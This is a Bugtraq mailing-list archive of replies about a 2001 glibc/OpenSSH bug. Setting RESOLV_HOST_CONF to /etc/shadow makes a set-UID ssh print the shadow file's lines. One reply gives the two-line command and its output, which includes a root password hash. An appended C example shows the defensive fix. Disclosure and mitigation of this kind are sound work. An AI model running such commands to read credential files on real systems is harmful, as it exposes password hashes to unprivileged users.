Bugtraq mailing list archives
Re: Glibc Local Root Exploit
From: Ben Greenbaum <bgreenbaum () SECURITYFOCUS COM>
Date: Wed, 10 Jan 2001 17:53:03 -0800
Summary of responses:

----------------------------------
From: Jag <agrajag () linuxpower org>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:

> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.

I have reproduced it with glibc-2.2 and openssh-2.3.0p1. The key is that you must actually ssh to a valid host. If ssh can't resolve the host, it won't display the contents of the file.

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:

> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.

Let's test it. :-)

[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x 1 root root 176036 Jan 6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command `root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268'
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::

Nice. :)

[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4
[lukasz@lt lukasz]$ rpm -q glibc
glibc-2.2-9

All was taken from RH updates.

[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)

but:

[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x 1 root root 176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:

glibc 2.2-9, openssh-2.3.0, RH 7.0.

Solution: Only passwd needs setuid flag. :)

-------------------------------------------------------------------------
From: Alexander Schreiber <alexander.schreiber () informatik tu-chemnitz de>

Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does not work.

----------------------------------------------
From: Michael Devogelaere <michael () digibel be>

It works on my system: glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat) (luckily enough I don't tolerate users on my system <grin>)

-----------------------------------------
From: elliptic <elliptic () cipherpunks com>

Likewise, I cannot reproduce this bug on Slackware Linux 7.0, which is currently using glibc version 2.1.3. Additionally, this is the revision of glibc included with Slackware 7.1, which would likely also not be vulnerable.

------------------------------------------------------
From: Joseph Nicholas Yarbrough <nyarbrough () lurhq com>

I am unable to reproduce this using slackware 7.1 (glibc 2.1.3). What version of slackware were these "others" reporting positive results from?

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

> [lukasz@lt lukasz]$ rpm -q openssh
> openssh-2.3.0p1-4

I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read /etc/shadow, too). :-)
------------------------------------------------
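The responses above agree on the mechanism: a set-UID ssh honours the RESOLV_HOST_CONF environment variable, reads whatever file it names, and echoes each unparseable line back in a "bad command" message. The following is an added illustration for this thread, not code from the thread, from glibc or from OpenSSH, of the two behaviours a defender wants from any program that lets an environment variable redirect a configuration file: ignore the override while running with raised privilege, and report a rejected line by number without echoing its content. The function names, the keyword list for host.conf, and the two sample texts (including the placeholder hash) are this example's own assumptions.

```c
/* Added example, not code from the Bugtraq thread or from glibc/OpenSSH.
 * It models how a program that lets an environment variable (here
 * RESOLV_HOST_CONF, as in the thread) redirect a configuration file should
 * behave: ignore the override under raised privilege, and never echo the
 * rejected file's content in a diagnostic. Function names, the keyword
 * list and the sample texts are this example's own choices. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/auxv.h>   /* getauxval(AT_SECURE): glibc 2.16+ */
#endif

#define DEFAULT_HOST_CONF "/etc/host.conf"

/* Nonzero when the process holds more privilege than the user who started
 * it: real and effective ids differ (set-UID/set-GID binary), or the kernel
 * flagged the execution as secure (AT_SECURE, which on Linux also covers
 * file capabilities). */
int running_privileged(void)
{
    if (getuid() != geteuid() || getgid() != getegid())
        return 1;
#if defined(__linux__) && defined(AT_SECURE)
    if (getauxval(AT_SECURE) != 0)
        return 1;
#endif
    return 0;
}

/* Pick the configuration path. The environment override is honoured only
 * for an unprivileged process; a privileged one always reads the default,
 * so a setuid binary cannot be pointed at /etc/shadow. */
const char *choose_host_conf(const char *env_value, int privileged)
{
    if (privileged || env_value == NULL || *env_value == '\0')
        return DEFAULT_HOST_CONF;
    return env_value;
}

/* Keywords accepted at the start of a host.conf line (assumed list). */
static const char *const keywords[] = {
    "order", "trim", "multi", "nospoof", "spoofalert", "reorder", NULL
};

static int is_keyword(const char *tok, size_t len)
{
    for (int i = 0; keywords[i] != NULL; i++)
        if (strlen(keywords[i]) == len && strncmp(keywords[i], tok, len) == 0)
            return 1;
    return 0;
}

/* Count lines whose first token is not a known keyword. Blank and '#'
 * comment lines are skipped. Bad lines are reported by number only: the
 * content is withheld, so the diagnostic cannot disclose the file the way
 * the "bad command `root:...'" messages in the thread do. */
int count_bad_lines(const char *name, const char *text, FILE *diag)
{
    int bad = 0, lineno = 0;
    const char *p = text;
    while (*p != '\0') {
        const char *end = strchr(p, '\n');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        size_t tok = strcspn(p, " \t\n");   /* first token; stops at '\n' */
        lineno++;
        if (tok > 0 && p[0] != '#' && !is_keyword(p, tok)) {
            bad++;
            if (diag)
                fprintf(diag, "%s: line %d: bad command (content withheld)\n", name, lineno);
        }
        p = end ? end + 1 : p + len;
    }
    return bad;
}

/* Constructed sample inputs. The second imitates the shape of a shadow file
 * with a placeholder hash; it is not real credential data. */
const char SAMPLE_HOST_CONF[] = "order hosts,bind\nmulti on\n# comment\n";
const char SAMPLE_SHADOW_LIKE[] =
    "root:$1$PLACEHOLDERHASH:11270:0:99999:7:::\n"
    "bin:x:10679:0:99999:7:::\n"
    "daemon:x:10679:0:99999:7:::\n";

int main(void)
{
    int priv = running_privileged();
    const char *path = choose_host_conf(getenv("RESOLV_HOST_CONF"), priv);
    printf("privileged=%d, configuration read from %s\n", priv, path);
    printf("bad lines in constructed host.conf: %d\n",
           count_bad_lines("host.conf", SAMPLE_HOST_CONF, stderr));
    printf("bad lines in constructed shadow-like text: %d\n",
           count_bad_lines("shadow-like", SAMPLE_SHADOW_LIKE, stderr));
    return 0;
}
```

Run as an ordinary user the program honours RESOLV_HOST_CONF; installed set-UID it would fall back to /etc/host.conf regardless of the environment. Later glibc releases added secure_getenv() (glibc 2.17), which returns NULL in exactly the privileged case running_privileged() detects, so application code can use that instead of the hand-rolled check. The thread's own mitigation, dropping the set-UID bit from ssh as Lukasz Trabinski notes, removes the privilege gap entirely and is the simpler fix where ssh does not need it.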